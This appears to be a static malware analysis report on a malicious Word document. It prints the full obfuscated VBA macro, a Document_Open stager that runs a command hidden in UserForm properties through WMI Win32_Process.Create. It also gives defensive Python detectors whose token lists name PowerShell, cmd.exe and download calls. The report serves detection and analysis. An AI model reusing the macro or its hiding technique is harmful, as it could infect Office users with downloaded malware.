Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6650aa32b3548c6…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 185.4 KB
Created: 2019-12-13 15:20:00
Authoring application: Microsoft Office Word
First seen: 2022-06-20
MD5: 92b3ca8ee54f0983747e2906998bb7fb
SHA-1: 2499760133f23e1c1b61703442dbbab966980b96
SHA-256: e6650aa32b3548c626f1010e651be2e8fc133cc8d1ba7014bf07b3bfc20314ea
Risk Score: 232

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-7452078-0 (critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Generic-7452078-0
  • VBA macros detected (medium; 4 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager (critical) [OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER]
    An auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and form or control properties that are invisible in the VBA source, such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set; it is a social-engineering macro, not an Office CVE exploit primitive. In this sample, Document_open decodes the literal "winmgmts:Win32_" with Join/Split, completes the class name with the text of an MSForms TextBox control (Frxrexkafow, hosted by the Wzlsluxcmitn module, whose VB_Base CLSID {00020906-0000-0000-C000-000000000046} marks it as the Word document class module) and the literal "rocess", binds to it with CreateObject, and then calls .Create on the resulting object with a command line assembled from properties of the Eailhicuzjotr UserForm (including ControlTipText). The command line therefore lives in the form and control storage, not in the VBA source, and cannot be recovered from the decoded macro text alone.
    Matched line in script
    Djcuknykpld = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Wzlsluxcmitn.Frxrexkafow + "rocess"
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    CreateObject call on a runtime-built string. Note that Null & <string> evaluates to the string in VBA, so the Null here changes nothing at runtime; it only breaks naive pattern matching on the CreateObject argument.
    Matched line in script
    Set Mlviehfynbi = CreateObject(Null & Djcuknykpld)
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA (p-code) or performance-cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags documents whose VBA source is unavailable or untrustworthy, such as p-code-only (VBA-stomped) macros or samples where source extraction failed. In this sample the pairing is the Document_open entry point with CreateObject, both of which are also visible in the decoded source.
  • Document_Open macro (low) [OLE_VBA_DOCOPEN]
    Document_Open handler: runs as soon as the document is opened with macros enabled, with no further user interaction.
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main
    Channel: in document text (OLE body)
    This is the standard DrawingML XML namespace URI carried by Office documents, not a network indicator. No payload URL is visible in the decoded macro source, which is consistent with the command line being stored in form properties rather than in VBA literals.
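
The co-occurrence rule behind OLE_VBA_PCODE_AUTOEXEC_EXEC, written out as an added example for this report (this is not the analyzer's own code). It works on raw bytes so it can be pointed at a module stream, a _VBA_PROJECT cache or any carved blob, and it fires only when an auto-exec token and an execution token share a stream. The sample streams are constructed inline and are not carved from this sample.

```python
"""Auto-exec + execution token co-occurrence check over raw VBA streams.

Added example for this report, not the analyzer's implementation. Fires only
when at least one token from EACH list is found in the same stream; neither
list alone is sufficient.
"""
import re

AUTOEXEC_TOKENS = (
    "Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
    "Auto_Close", "AutoClose",
)
EXEC_TOKENS = (
    "Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
    "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
    "ShellExecute", "ExecuteExcel4Macro",
)


def _patterns(token: str):
    """ASCII pattern with identifier boundaries (so 'Shell' inside 'eggshell'
    is ignored) plus a UTF-16LE pattern, so the check does not depend on
    which encoding a given stream uses for names. Both are case-insensitive,
    as VBA identifiers are."""
    ascii_pat = re.compile(
        rb"(?<![A-Za-z0-9_])" + re.escape(token.encode("ascii")) + rb"(?![A-Za-z0-9_])",
        re.IGNORECASE,
    )
    utf16_pat = re.compile(re.escape(token.encode("utf-16-le")), re.IGNORECASE)
    return ascii_pat, utf16_pat


def find_tokens(stream: bytes, tokens) -> list:
    """Return the canonical names of every token present in the stream."""
    return [tok for tok in tokens if any(p.search(stream) for p in _patterns(tok))]


def pcode_autoexec_exec(stream: bytes) -> dict:
    """Verdict plus the matched tokens for one stream."""
    auto = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    return {"fires": bool(auto and execs), "autoexec": auto, "exec": execs}


# Constructed sample streams (not carved from the real sample).
SAMPLES = {
    # Module stream with the source stripped down to the names p-code keeps.
    "stripped_module": b"\x00Document_open\x00CreateObject\x00Null\x00",
    # Entry point only: a benign Document_Open that just sets a title.
    "autoexec_only": b"Private Sub Document_Open()\r\nActiveDocument.Title = \"x\"\r\nEnd Sub\r\n",
    # Execution token only, reached from a button handler, not from auto-exec.
    "exec_only": b"Private Sub Button_Click()\r\nSet o = CreateObject(\"Scripting.FileSystemObject\")\r\nEnd Sub\r\n",
    # Cache-style stream: UTF-16LE entry point name next to an ASCII Shell token.
    "utf16_cache": b"\x01\x02" + "Auto_Open".encode("utf-16-le") + b"\x00\x00Shell\x00",
}


def triage(samples=SAMPLES) -> dict:
    """Run the check over every named stream."""
    return {name: pcode_autoexec_exec(data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, res in triage().items():
        print(f"{name:16s} fires={res['fires']!s:5} auto={res['autoexec']} exec={res['exec']}")
```

Only "stripped_module" and "utf16_cache" fire; the two single-token streams do not, which is the point of the pairing rule. The boundary check on the ASCII pattern is what keeps document prose containing words like "shell" from counting as an execution token.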

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  10991 bytes
SHA-256: 360baa2e8371d149970bac6b48fa0b4ead77c6c70f170b7b260c86e68e558e14
Detection
ClamAV: No threats found
Obfuscation or payload: likely
228 of 353 identifier-like tokens look randomly generated (e.g. 'winOMDNmgmOMDNts', which is in fact a fragment of the Split string literal; the procedure and variable names such as 'Djcuknykpld' and 'Wzlsluxcmitn' are the genuine mangled identifiers). This is consistent with name-mangling obfuscation, and the dead Select Case blocks filled with Hex/CVar/CDate/CInt/Log calls on never-assigned variables are padding with no effect on the stager.
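
The "looks randomly generated" heuristic, as an added example written for this report (it is not the analyzer's code, and its thresholds are assumptions tuned on the names visible above). It scores each identifier by vowel ratio and longest consonant run, strips string literals first so that fragments like 'winOMDNmgmOMDNts' are not counted as identifiers, and is run over a snippet constructed from lines quoted in this report.

```python
"""Randomly-generated-identifier heuristic for VBA name mangling.

Added example for this report, not the analyzer's code. Pronounceable names
have a vowel every few letters; mangled names such as 'Djcuknykpld' do not.
The min_len / max_run / min_vowel_ratio thresholds are assumptions.
"""
import re

VOWELS = set("aeiouAEIOU")
# Keywords and built-ins that must not be scored as user identifiers. This
# list covers the snippet below; real triage would use the full VBA set.
VBA_RESERVED = {
    "Private", "Public", "Sub", "Function", "End", "Select", "Case", "Set",
    "Null", "Empty", "False", "True", "Do", "While", "Loop", "Attribute",
    "Hex", "CVar", "CDate", "CInt", "Log", "Join", "Split", "CreateObject",
}
STRING_LITERAL = re.compile(r'"[^"]*"')
IDENTIFIER = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")


def identifier_features(ident: str):
    """(letter count, vowel ratio, longest consonant run) for one name."""
    letters = [c for c in ident if c.isalpha()]
    if not letters:
        return 0, 0.0, 0
    vowels = sum(c in VOWELS for c in letters)
    longest = run = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    return len(letters), vowels / len(letters), longest


def looks_random(ident: str, min_len: int = 6, max_run: int = 4,
                 min_vowel_ratio: float = 0.20) -> bool:
    """Short names are never flagged; long ones are flagged on either a long
    consonant run or a very low vowel ratio."""
    n, ratio, longest = identifier_features(ident)
    if n < min_len:
        return False
    return longest >= max_run or ratio < min_vowel_ratio


def score_source(vba_source: str) -> dict:
    """Strip string literals, collect distinct non-reserved names, score them."""
    stripped = STRING_LITERAL.sub('""', vba_source)
    names = []
    for m in IDENTIFIER.finditer(stripped):
        tok = m.group(0)
        if tok in VBA_RESERVED or tok in names:
            continue
        names.append(tok)
    flagged = [n for n in names if looks_random(n)]
    return {"total": len(names), "flagged": flagged,
            "clean": [n for n in names if n not in flagged]}


# Constructed snippet assembled from lines quoted in this report.
SNIPPET = '''Private Sub Document_open()
Select Case Kcpgjokkt
Case 172
Jvlzujffqf = Hex(209)
End Select
Djcuknykpld = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Wzlsluxcmitn.Frxrexkafow + "rocess"
Set Mlviehfynbi = CreateObject(Null & Djcuknykpld)
End Sub
'''

if __name__ == "__main__":
    result = score_source(SNIPPET)
    print(f"{len(result['flagged'])} of {result['total']} identifiers look random")
    print("flagged:", result["flagged"])
    print("clean:  ", result["clean"])
```

On the snippet, six of seven identifiers are flagged and only Document_open survives. The heuristic is deliberately cheap and has false negatives: a vowel-rich mangled name such as 'Eailhicuzjotr' passes it, which is why the report's own figure is a ratio rather than a proof of obfuscation.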
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Wzlsluxcmitn"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Frxrexkafow, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Zfrwazjrxmqtc = Gghpxzqlx
Sewtqckfpkzw = Qpbbnjuj
Hqiaajuu = Geudvnjwz
Select _
 Case Kcpgjokkt
      Case 172
         Jvlzujffqf _
         = Hex _
         (209)
         Tmuxfzzxjbuxn = CVar(509)
         Qukjaixvzrwt _
         = Hex(981)
      Case 591
         Tdbigvtoqekt = CVar(30)
         Haolbool _
         = 899
         Bnwrufjgzfqys = CDate _
         (364)
      Case 520
         Xbbdfyhgw = _
         CInt(470)
         Dkrmcixghtzcu = Log(Etwjiizeemnh)
         Tgzdvczomdibl = Xzhtkunkmfq
End Select
   Vbeuvvmli = Zmrmmqwzqzv
Iikimmdgaxr = Zhykdcpe
Emrkcmufaeq = Kezvvkyoaul
Select _
 Case Afwtiidufvu
      Case 221
         Tgsroknt _
         = Hex _
         (626)
         Dguugyesf = CVar(883)
         Mojgvhiteje _
         = Hex(906)
      Case 416
         Qswigbdvmasm = CVar(886)
         Xvbcpimhril _
         = 800
         Eajwynzd = CDate _
         (758)
      Case 307
         Wmepsaoq = _
         CInt(82)
         Tlxdgplii = Log(Xnyzvcdtzol)
         Eqlsuhcsqkjs = Pjcrumnzy
End Select
   Lanbfrocgr = Esklhhjdu
Hakywhmrlt = Tbmzweudv
Jaixnbppqqq = Vtsuuzxn
Select _
 Case Rjvimzzrod
      Case 661
         Xnkyqwdl _
         = Hex _
         (89)
         Vlecmajw = CVar(780)
         Hornstcq _
         = Hex(839)
      Case 540
         Bcruwekvibkqx = CVar(915)
         Jdknyhsxhtj _
         = 354
         Gxtmupbsukghp = CDate _
         (909)
      Case 125
         Esqqdyiprds = _
         CInt(433)
         Ejaminolhx = Log(Mwotdfjtf)
         Dtsyyibjbyt = Jtycabwvuh
End Select
Lcjxqrregfpv
End Sub


Attribute VB_Name = "Eailhicuzjotr"
Attribute VB_Base = "0{A0DE5B0E-3A42-4D31-AD8D-9BF7FB3C621F}{C31CCB3A-629D-4A31-8589-006693104201}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ladkdwna"
Function Tykabrwzuun()
   Qoryrtuxjxfxp = Fptsiuvgnf
Qzpihlmnst = Ezmujhlyiqgl
Hcuheswi = Upylchtlpanji
Select _
 Case Gtwczsdreeksl
      Case 219
         Vwvoatizv _
         = Hex _
         (262)
         Vvppxuukyzzfd = CVar(464)
         Xuhsoiwjfqo _
         = Hex(240)
      Case 9
         Dxtbacxicogpy = CVar(398)
         Gvrrjkwoscn _
         = 990
         Lkyjauhbfyeah = CDate _
         (622)
      Case 312
         Fadphgdjzwjp = _
         CInt(289)
         Bznozwrqxp = Log(Paxmqccajrzx)
         Iaznrfarezrm = Dpdnlorcmn
End Select
Bahavnjxvpr = Wzlsluxcmitn.Frxrexkafow
   Klwlwotnisrch = Cqzaqyykcsf
Ifmwogot = Wmbidccsrar
Sfhbmausqu = Cgunahuwc
Select _
 Case Ppvhzzosjkw
      Case 936
         Gfbtmvfrjda _
         = Hex _
         (487)
         Fqswbgpqs = CVar(298)
         Suscbjugmdgv _
         = Hex(820)
      Case 817
         Khxwfmul = CVar(217)
         Xamjpdaoujar _
         = 600
         Pajtjeyv = CDate _
         (58)
      Case 109
         Rystnywhcxeb = _
         CInt(523)
         Qidsawaset = Log(Dbbmwbnrr)
         Gavmtpeyod = Bbfupuzu
End Select
Zfiwvmskvqzu = Bahavnjxvpr + Eailhicuzjotr.Zrlpryhuqkt + Eailhicuzjotr.Leduriedcjuge + Eailhicuzjotr.Yzvfmnkir
   Jvivsalsfz = Pkossydc
Zjxidxwcbzcl = Lhdzgktxbenhd
Dhxjsvyyj = Wcxvzdpshku
Select _
 Case Tycitvvueyxse
      Case 1
         Amjucsoq _
         = Hex _
         (977)
         Ejslktjcb = CVar(788)
         Tqeobtreadua _
         = Hex(752)
      Case 520
         Vaabcfhccold = CVar(315)
         Enpcnigwefbz _
         = 983
         Yckiftpsjb = CDate _
         (532)
      Case 378
         Mqnqcxjxzm = _
         CInt(276)
         Ndkyvuacjvez = Log(Ypeleodd)
         Iocdpymmosv = Qwoawarmnm
End Select
Ygwxzqui = Zfiwvmskvqzu + Eailhicuzjotr.Hoosyqxdiqzve + Eailhicuzjotr.Wizlkhvyxuqv.ControlTipText
   Kbhzaldy = Ydkhlriaghtw
Rzzcisfgederk = Csiqitkol
Fwckhnzlh = Apnnryhcth
Select _
 Case Eplftcgknecm
      Case 462
         Uvrszzgp _
         = Hex _
         (433)
         Dublhieyddyv = CVar(110)
         Fibqzwnae _
         = Hex(702)
      Case 989
         Llbicmoxs = CVar(363)
         Budezdjffzyjm _
         = 291
         Pquedqohvxdqa = CDate _
         (497)
      Case 810
         Xdghggnuxk = _
         CInt(103)
         Hencorewycnyi = Log(Hhvninwcucf)
         Bvxumrgciuoy = Luphzusgnbwi
End Select
Tykabrwzuun = Fjdzsojwt + Ygwxzqui + Fjdzsojwt
   Qczvaofa = Duxjskucxcegf
Knhgbaohgbzy = Omilbyxrxie
Xbyjwjaqax = Vpnqitmnlj
Select _
 Case Vdrysqzcprrgi
      Case 962
         Oganpozf _
         = Hex _
         (450)
         Boprzxolco = CVar(136)
         Cxkyrwdxgirq _
         = Hex(316)
      Case 123
         Kvahwxinr = CVar(171)
         Kqudugckwe _
         = 621
         Qwccldsw = CDate _
         (338)
      Case 125
         Snskusujogio = _
         CInt(383)
         Jumcpfcbh = Log(Ltvxkyfkrx)
         Jljpmqwubp = Qrqhtqqgzaiz
End Select
End Function
Function Lcjxqrregfpv()
   Cnmjjlmhwnhem = Tgqthcftiaqay
Wmeswivb = Btiuoimvfqkzo
Wudjslnuuquz = Qyedwgjxzu
Select _
 Case Eswqxyry
      Case 996
         Rsulnzndujs _
         = Hex _
         (4)
         Sgwsgkzvjro = CVar(143)
         Xetwiwkcglik _
         = Hex(216)
      Case 688
         Kvzilsdeka = CVar(971)
         Nzsibgfscj _
         = 839
         Bwbmlunhnapaj = CDate _
         (5)
      Case 706
         Nrstsqwi = _
         CInt(928)
         Xkcfahakch = Log(Rsqmyxmkrzsd)
         Jpsheoqc = Lcntoqgbow
End Select
Djcuknykpld = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Wzlsluxcmitn.Frxrexkafow + "rocess"
   Kqcwqfeugzfk = Ipotdlnyi
Hakwlisymfym = Toiatwplj
Fwmafmiseiet = Rmmszkdcnjxf
Select _
 Case Ncvredglfxh
      Case 838
         Thwoukecjdt _
         = Hex _
         (555)
         Ocicczotfbnmo = CVar(666)
         Fgokgtjvqvc _
         = Hex(322)
      Case 884
         Mdyciiodddvh = CVar(18)
         Nfjcgqpwcpjcb _
         = 679
         Shzfugcdl = CDate _
         (303)
      Case 395
         Flcdscbxv = _
         CInt(517)
         Swddpajsg = Log(Wkvvckplcy)
         Leuzwgae = Kodbrrbtsxy
End Select
Set Mlviehfynbi = CreateObject(Null & Djcuknykpld)
   Knyyyzpgi = Tyvqufsotjx
Ccmmicfwsam = Dznvksyv
Mpzbtabw = Iwwmcxgys
Select _
 Case Jysctbyyfjutb
      Case 918
         Jamvrezmthdbt _
         = Hex _
         (97)
         Zcidcrhzzz = CVar(127)
         Hxocvleofmwjt _
         = Hex(703)
      Case 482
         Yuqzfmsjsl = CVar(816)
         Fcbmwogspffip _
         = 385
         Gmfyjtfiejzxl = CDate _
         (987)
      Case 869
         Wqxnyleazun = _
         CInt(269)
         Tohjqolxmmofa = Log(Cxrvebjplcpmc)
         Evciopcpg = Qjdiiyrh
End Select
Zkmbajjkvng = Djcuknykpld + Eailhicuzjotr.Bnornhmwuft.ControlTipText + Eailhicuzjotr.Btkxiqjnk.ControlTipText
   Qiijeduclwtn = Bnasblkcwm
Dowgxays = Zfibgojcmqbw
Mwjxkomv = Zffeyton
Select _
 Case Nukzfwtua
      Case 358
         Husubqbi _
         = Hex _
         (945)
         Dlgcaieds = CVar(533)
         Snqrljsourv _
         = Hex(233)
      Case 89
         Rlnkwcnenykid = CVar(676)
         Npqhxopg _
         = 461
         Phiuwqhr = CDate _
         (933)
      Case 959
         Puthpojfof = _
         CInt(266)
         Lnafbnwlc = Log(Igvekridrw)
         Tvjsjekrwth = Tqouvwhkjkau
End Select
Ccupqwhpsoob = Zkmbajjkvng + Wzlsluxcmitn.Frxrexkafow
   Gmcwqswagyq = Rnjidanh
Slbmbsit = Nolhqsyloi
Ourmrygeojw = Lpfuiyesaq
Select _
 Case Crkbcsbr
      Case 203
         Gvobjntxesaxe _
         = Hex _
         (800)
         Qgjeuodokpgw = CVar(993)
         Qvtfpikfgo _
         = Hex(724)
      Case 282
         Cmkaemgillrmj = CVar(253)
         Heldrrln _
         = 289
         Spvjkzunv = CDate _
         (531)
      Case 740
         Dkkupuaedgvi = _
         CInt(956)
         Bulairyn = Log(Xkzblwzoul)
         Ajbxkjtbwgrg = Jmnutpryw
End Select
Set Lcjxqrregfpv = CreateObject(Ccupqwhpsoob)
   Sdsfkacerbi = Wwsqktqeodjiq
Povjbmsbzkt = Upussyoudpod
Ezjxtjmodf = Keusgrlw
Select _
 Case Jrprcvlyhffco
      Case 935
         Nzzifmotpnk _
         = Hex _
         (612)
         Jwszafqrhc = CVar(24)
         Deysxipscts _
         = Hex(72)
      Case 503
         Emuxadsvapk = CVar(115)
         Bimyfwsrc _
         = 114
         Arfuiiqehlw = CDate _
         (300)
      Case 4
         Uhyovcpogrghf = _
         CInt(410)
         Wtwbeexiyxn = Log(Gfufoqexxdwzr)
         Ayncfcinoupr = Arilqiaxaspyp
End Select
Lcjxqrregfpv.XSize = False * False
   Eknxqyskvna = Fcldxvxeaxtv
Qofapmhf = Zpsxxoxkkfqm
Wgimentcb = Vpnlknzz
Select _
 Case Hczglzik
      Case 328
         Efadjevbpz _
         = Hex _
         (727)
         Xvcykzzrqnr = CVar(475)
         Difsokrsixp _
         = Hex(361)
      Case 119
         Cfsyjsgsee = CVar(592)
         Ojlrwrozof _
         = 667
         Ibofwoymkax = CDate _
         (504)
      Case 476
         Rdzuwyeafzbgb = _
         CInt(177)
         Bovwjcphd = Log(Qfrcomrrenpfs)
         Pdcnzvbrlvfa = Cwvsziyjdkooj
End Select
Lcjxqrregfpv.YSize = False * False
   Mxgpruvddfqzi = Vatbrducfapm
Ivsnshrb = Gthiuxwlfoi
Vmtrvapbihzvj = Prdtvevyvm
Select _
 Case Ddhyufywa
      Case 508
         Waqnylimkzk _
         = Hex _
         (776)
         Lohsaoxfnsl = CVar(450)
         Ifqlalqb _
         = Hex(175)
      Case 522
         Eqwmnzxishtn = CVar(539)
         Fvmckjhepxddw _
         = 48
         Zflfvdcebjfqk = CDate _
         (341)
      Case 40
         Gvytffynqxl = _
         CInt(249)
         Zikdxjsc = Log(Kudrktfsx)
         Qhedutbsvhkdb = Ybtaaozmnycn
End Select
Do While Mlviehfynbi.Create(Null & Tykabrwzuun, Qxlgpmsayi, Lcjxqrregfpv)
Loop
   Dwrgtyayfm = Lbfebgrj
Fzjvwguez = Xmztdjnczy
Mobwfkwpvtv = Wxcudbmcropg
Select _
 Case Xegpjqjwhukpt
      Case 496
         Qdricglkivwc _
         = Hex _
         (437)
         Zlpunylpelah = CVar(685)
         Hjnijjalyxi _
         = Hex(483)
      Case 531
         Tytmovbhju = CVar(570)
         Ehbygiugu _
         = 913
         Hoteunnsmvnsq = CDate _
         (381)
      Case 688
         Lmziyptceczmr = _
         CInt(181)
         Kqqzmyvrgtv = Log(Krokoiwih)
         Jomobubvd = Wbqyzquspc
End Select
End Function
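
The Join/Split decode and the property-concatenation chain flagged by OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER and OLE_VBA_CREATEOBJ can be replayed statically from the lines above (Djcuknykpld, Mlviehfynbi, Zkmbajjkvng, Ccupqwhpsoob, Tykabrwzuun and the .Create call). The following Python is an added example written for this report; it is not code from the sample and not part of oletools. Every value in ASSUMED_FORM_VALUES is an assumption: the TextBox text and the UserForm properties are stored in the form and control streams, not in the decoded VBA, so they must be pulled from those streams (olevba also reports the strings it finds in VBA form streams) before the real command line is known.

```python
"""Replay of the Join/Split + form-property stager chain in this macro.

Added example for this report; not code from the sample or from oletools.
It (1) evaluates the Join(Split("text","sep"),"glue") idiom used to hide
literals, (2) models the VBA concatenation rules the chain relies on
(Null & s and Empty + s both give s; False * False is 0), and (3) replays the
assignments quoted in the report to show which string reaches CreateObject
and which reaches .Create. ASSUMED_FORM_VALUES are assumptions, not data
recovered from the sample.
"""
import re

# Join(Split("text", "sep"), "glue") with all three arguments as quoted literals.
JOIN_SPLIT = re.compile(
    r'Join\(\s*Split\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)\s*,\s*"([^"]*)"\s*\)'
)


def vba_join_split(text: str, sep: str, glue: str = "") -> str:
    """VBA semantics: Split on an empty delimiter returns the whole string as
    one element, and the default compare mode is binary (case-sensitive)."""
    parts = text.split(sep) if sep else [text]
    return glue.join(parts)


def resolve_join_split(vba_line: str) -> str:
    """Rewrite each Join(Split(...)) of literals on a line into the plain string."""
    return JOIN_SPLIT.sub(
        lambda m: '"' + vba_join_split(m.group(1), m.group(2), m.group(3)) + '"',
        vba_line,
    )


VBA_NULL = None   # `Null & "x"` -> "x"
VBA_EMPTY = ""    # never-assigned Variant; `Empty + "x"` -> "x"


def vba_concat(*parts) -> str:
    """String concatenation as VBA's & and + behave for Null and Empty."""
    return "".join("" if p is None else str(p) for p in parts)


# ASSUMED values. Chosen so the chain lands on the classes whose members the
# macro then uses: Win32_Process.Create and the XSize/YSize properties of
# Win32_ProcessStartup. WMI class names are case-insensitive, so the trailing
# "P" contributed by the TextBox is accepted by the moniker.
ASSUMED_FORM_VALUES = {
    "Wzlsluxcmitn.Frxrexkafow": "P",                       # MSForms TextBox text
    "Eailhicuzjotr.Bnornhmwuft.ControlTipText": "Start",
    "Eailhicuzjotr.Btkxiqjnk.ControlTipText": "u",
    # Command-line fragments: the real contents are not on this page.
    "Eailhicuzjotr.Zrlpryhuqkt": "<frag1>",
    "Eailhicuzjotr.Leduriedcjuge": "<frag2>",
    "Eailhicuzjotr.Yzvfmnkir": "<frag3>",
    "Eailhicuzjotr.Hoosyqxdiqzve": "<frag4>",
    "Eailhicuzjotr.Wizlkhvyxuqv.ControlTipText": "<frag5>",
}


def reconstruct_stager(fv: dict) -> dict:
    tb = fv["Wzlsluxcmitn.Frxrexkafow"]
    # Djcuknykpld = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN","OMDN"),"") + Frxrexkafow + "rocess"
    djc = vba_concat(vba_join_split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), tb, "rocess")
    # Set Mlviehfynbi = CreateObject(Null & Djcuknykpld)
    wmi_class = vba_concat(VBA_NULL, djc)
    # Zkmbajjkvng = Djcuknykpld + Bnornhmwuft.ControlTipText + Btkxiqjnk.ControlTipText
    # Ccupqwhpsoob = Zkmbajjkvng + Frxrexkafow ; Set Lcjxqrregfpv = CreateObject(Ccupqwhpsoob)
    startup = vba_concat(djc, fv["Eailhicuzjotr.Bnornhmwuft.ControlTipText"],
                         fv["Eailhicuzjotr.Btkxiqjnk.ControlTipText"], tb)
    # Lcjxqrregfpv.XSize = False * False ; .YSize = False * False -> 0, 0
    xsize = ysize = int(False) * int(False)
    # Tykabrwzuun = Fjdzsojwt + (Frxrexkafow + Zrlpryhuqkt + Leduriedcjuge + Yzvfmnkir
    #               + Hoosyqxdiqzve + Wizlkhvyxuqv.ControlTipText) + Fjdzsojwt
    # Fjdzsojwt is never assigned in the extracted source, so it is Empty.
    cmd = vba_concat(VBA_EMPTY, tb,
                     fv["Eailhicuzjotr.Zrlpryhuqkt"], fv["Eailhicuzjotr.Leduriedcjuge"],
                     fv["Eailhicuzjotr.Yzvfmnkir"], fv["Eailhicuzjotr.Hoosyqxdiqzve"],
                     fv["Eailhicuzjotr.Wizlkhvyxuqv.ControlTipText"], VBA_EMPTY)
    # Do While Mlviehfynbi.Create(Null & Tykabrwzuun, Qxlgpmsayi, Lcjxqrregfpv): Loop
    # Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation,
    # ProcessId) returns 0 on success, so the loop body never runs; a non-zero
    # return re-evaluates the condition and retries the Create call.
    return {
        "wmi_class_moniker": wmi_class,
        "startup_moniker": startup,
        "startup_xsize": xsize,
        "startup_ysize": ysize,
        "command_line": vba_concat(VBA_NULL, cmd),
        "current_directory": VBA_EMPTY,   # Qxlgpmsayi is never assigned
    }


if __name__ == "__main__":
    print(resolve_join_split('Djcuknykpld = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Wzlsluxcmitn.Frxrexkafow + "rocess"'))
    for k, v in reconstruct_stager(ASSUMED_FORM_VALUES).items():
        print(f"{k:20s} {v!r}")
```

Two things the replay makes visible that the raw source hides: the same TextBox value both completes the WMI class name and is the first character of the command line, and the only part of the chain that is fully determined by the VBA is the "winmgmts:Win32_" prefix. Everything else, including the payload, has to be read out of the form and control streams, which is exactly why the heuristic names hidden form properties as the staging channel.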